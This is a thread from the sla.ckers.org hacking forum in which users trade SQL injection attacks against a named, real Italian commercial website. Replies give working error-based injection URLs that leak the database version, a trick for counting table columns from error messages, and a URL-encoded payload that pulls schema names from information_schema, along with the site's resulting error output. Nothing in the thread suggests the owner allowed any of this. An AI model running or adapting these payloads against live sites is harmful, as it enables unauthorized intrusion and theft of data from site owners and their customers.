Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
i need to refresh my memory...
Posted by: tascio
Date: May 26, 2014 09:53AM

omg i need to remember some sqlinj^^

http://www.pubblicitafaidate.it/index.php?prod=96

Options: ReplyQuote
Re: i need to refresh my memory...
Posted by: kenjii
Date: May 26, 2014 07:18PM

hi for hack this website i find 3 way,

1 USe error based injection
To injection this website use ERROR Based injection

http://www.pubblicitafaidate.it/index.php?prod=96 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

give u version in the error :
Duplicate entry '5.1.49-3:1' for key 'group_key'

2 if u still whant to use UNION injection :
In the message error you have the table name so it's easy to get columns count in 1 request :
http://www.pubblicitafaidate.it/index.php?prod=96 and (select * from productos_idiomas)=(select 1)

will give u the error :
Operand should contain 6 column(s)


3 Your injection point is after the where part

Use ajkaro tutorial for learn how inject after/before where part :)

Options: ReplyQuote
Re: i need to refresh my memory...
Posted by: Whitehat
Date: June 19, 2014 08:30AM

Hope you get the difference :)

http://www.pubblicitafaidate.it/index.php?prod=96+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Cschema_name%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1


http://www.pubblicitafaidate.it/index.php?prod=96+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Cschema_name%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1

Options: ReplyQuote


Sorry, only registered users may post in this forum.